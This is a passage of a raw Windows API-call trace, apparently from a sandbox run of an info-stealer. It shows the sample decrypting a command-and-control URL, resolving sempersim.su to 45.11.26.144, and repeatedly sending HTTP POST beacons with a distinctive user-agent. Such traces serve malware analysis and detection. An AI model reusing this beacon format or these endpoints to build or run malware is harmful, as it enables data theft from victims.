[0164.189] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0164.189] GetProcessHeap () returned 0x5b0000 [0164.189] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3470 [0164.189] GetProcessHeap () returned 0x5b0000 [0164.189] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0164.190] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0164.191] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0164.191] GetProcessHeap () returned 0x5b0000 [0164.191] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5ce180 [0164.191] GetProcessHeap () returned 0x5b0000 [0164.191] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0164.191] send (s=0x2b0, buf=0x5ce180*, len=236, flags=0) returned 236 [0164.192] send (s=0x2b0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0164.192] GetProcessHeap () returned 0x5b0000 [0164.192] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0164.192] recv (in: s=0x2b0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0165.723] GetProcessHeap () returned 0x5b0000 [0165.723] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ce180 | out: hHeap=0x5b0000) returned 1 [0165.724] GetProcessHeap () returned 0x5b0000 [0165.724] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0165.724] GetProcessHeap () returned 0x5b0000 [0165.725] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0165.725] GetProcessHeap () returned 0x5b0000 [0165.725] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0165.725] closesocket (s=0x2b0) returned 0 [0165.726] GetProcessHeap () returned 0x5b0000 [0165.726] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca960 | out: hHeap=0x5b0000) returned 1 [0165.726] GetProcessHeap () returned 0x5b0000 [0165.726] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0165.726] GetProcessHeap () returned 0x5b0000 [0165.726] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0165.726] GetProcessHeap () returned 0x5b0000 [0165.726] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0165.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x10b4) returned 0x2b0 [0165.728] Sleep (dwMilliseconds=0xea60) [0165.735] GetProcessHeap () returned 0x5b0000 [0165.735] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0165.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.737] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0165.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.743] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0165.749] GetProcessHeap () returned 0x5b0000 [0165.749] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0165.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.752] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0165.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.753] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0165.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.753] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.753] GetProcessHeap () returned 0x5b0000 [0165.754] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0165.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.755] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0165.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.755] CryptDestroyKey (hKey=0x5be048) returned 1 [0165.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.756] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0165.756] GetProcessHeap () returned 0x5b0000 [0165.756] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0165.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0165.757] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0165.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0165.758] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0165.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0165.759] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0165.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0165.760] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0165.760] GetProcessHeap () returned 0x5b0000 [0165.760] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0165.760] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0165.760] GetProcessHeap () returned 0x5b0000 [0165.761] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0165.761] GetProcessHeap () returned 0x5b0000 [0165.761] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0165.761] GetProcessHeap () returned 0x5b0000 [0165.761] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0165.761] GetProcessHeap () returned 0x5b0000 [0165.761] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0165.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.763] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0165.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.774] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0165.784] GetProcessHeap () returned 0x5b0000 [0165.784] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0165.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.786] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0165.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.787] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0165.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.788] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.788] GetProcessHeap () returned 0x5b0000 [0165.788] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0165.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.790] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3398, pdwDataLen=0xdfcfc | out: pbData=0x5d3398, pdwDataLen=0xdfcfc) returned 1 [0165.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.791] CryptDestroyKey (hKey=0x5bde08) returned 1 [0165.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0165.792] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0165.792] GetProcessHeap () returned 0x5b0000 [0165.792] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0165.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0165.793] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0165.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0165.794] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0165.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0165.795] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0165.795] GetProcessHeap () returned 0x5b0000 [0165.795] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0165.795] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cda20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0165.796] GetProcessHeap () returned 0x5b0000 [0165.797] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca950 [0165.797] socket (af=2, type=1, protocol=6) returned 0x2b4 [0165.797] connect (s=0x2b4, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0165.943] FreeAddrInfoW (pAddrInfo=0x5cda20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0165.943] GetProcessHeap () returned 0x5b0000 [0165.943] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0165.943] GetProcessHeap () returned 0x5b0000 [0165.943] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0165.944] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0165.945] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0165.945] GetProcessHeap () returned 0x5b0000 [0165.945] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0165.945] GetProcessHeap () returned 0x5b0000 [0165.945] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0165.945] GetProcessHeap () returned 0x5b0000 [0165.946] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0165.946] GetProcessHeap () returned 0x5b0000 [0165.946] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0165.946] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0165.947] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0165.947] GetProcessHeap () returned 0x5b0000 [0165.947] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5ce180 [0165.947] GetProcessHeap () returned 0x5b0000 [0165.947] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0165.947] send (s=0x2b4, buf=0x5ce180*, len=236, flags=0) returned 236 [0165.948] send (s=0x2b4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0165.948] GetProcessHeap () returned 0x5b0000 [0165.948] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0165.948] recv (in: s=0x2b4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0167.523] GetProcessHeap () returned 0x5b0000 [0167.524] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ce180 | out: hHeap=0x5b0000) returned 1 [0167.524] GetProcessHeap () returned 0x5b0000 [0167.524] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0167.524] GetProcessHeap () returned 0x5b0000 [0167.524] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0167.524] GetProcessHeap () returned 0x5b0000 [0167.524] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0167.524] closesocket (s=0x2b4) returned 0 [0167.525] GetProcessHeap () returned 0x5b0000 [0167.525] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca950 | out: hHeap=0x5b0000) returned 1 [0167.525] GetProcessHeap () returned 0x5b0000 [0167.525] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0167.525] GetProcessHeap () returned 0x5b0000 [0167.526] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0167.526] GetProcessHeap () returned 0x5b0000 [0167.526] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0167.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x7b0) returned 0x2b4 [0167.528] Sleep (dwMilliseconds=0xea60) [0167.530] GetProcessHeap () returned 0x5b0000 [0167.530] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3080 [0167.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.531] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0167.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.538] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0167.545] GetProcessHeap () returned 0x5b0000 [0167.545] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0167.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.546] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0167.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.550] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0167.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.551] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.551] GetProcessHeap () returned 0x5b0000 [0167.551] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0167.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.552] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3080, pdwDataLen=0xdfcfc | out: pbData=0x5d3080, pdwDataLen=0xdfcfc) returned 1 [0167.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.553] CryptDestroyKey (hKey=0x5bde08) returned 1 [0167.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.554] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0167.554] GetProcessHeap () returned 0x5b0000 [0167.554] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0167.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0167.555] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0167.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0167.556] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0167.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0167.557] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0167.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0167.558] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0167.558] GetProcessHeap () returned 0x5b0000 [0167.558] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0167.558] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0167.559] GetProcessHeap () returned 0x5b0000 [0167.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0167.559] GetProcessHeap () returned 0x5b0000 [0167.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0167.560] GetProcessHeap () returned 0x5b0000 [0167.560] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0167.560] GetProcessHeap () returned 0x5b0000 [0167.560] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d30c8 [0167.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.561] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0167.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.572] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0167.581] GetProcessHeap () returned 0x5b0000 [0167.581] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0167.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.582] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0167.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.583] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0167.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.584] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.584] GetProcessHeap () returned 0x5b0000 [0167.585] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0167.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.586] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d30c8, pdwDataLen=0xdfcfc | out: pbData=0x5d30c8, pdwDataLen=0xdfcfc) returned 1 [0167.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.587] CryptDestroyKey (hKey=0x5bde08) returned 1 [0167.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0167.588] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0167.588] GetProcessHeap () returned 0x5b0000 [0167.588] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0167.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0167.589] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0167.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0167.590] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0167.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0167.591] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0167.591] GetProcessHeap () returned 0x5b0000 [0167.591] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0167.591] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdea8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0167.597] GetProcessHeap () returned 0x5b0000 [0167.597] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0167.597] socket (af=2, type=1, protocol=6) returned 0x2b8 [0167.597] connect (s=0x2b8, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0167.666] FreeAddrInfoW (pAddrInfo=0x5cdea8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0167.666] GetProcessHeap () returned 0x5b0000 [0167.666] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0167.666] GetProcessHeap () returned 0x5b0000 [0167.666] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0167.666] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0167.667] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0167.667] GetProcessHeap () returned 0x5b0000 [0167.667] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0167.667] GetProcessHeap () returned 0x5b0000 [0167.668] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0167.668] GetProcessHeap () returned 0x5b0000 [0167.668] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0167.668] GetProcessHeap () returned 0x5b0000 [0167.668] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0167.669] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0167.670] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: 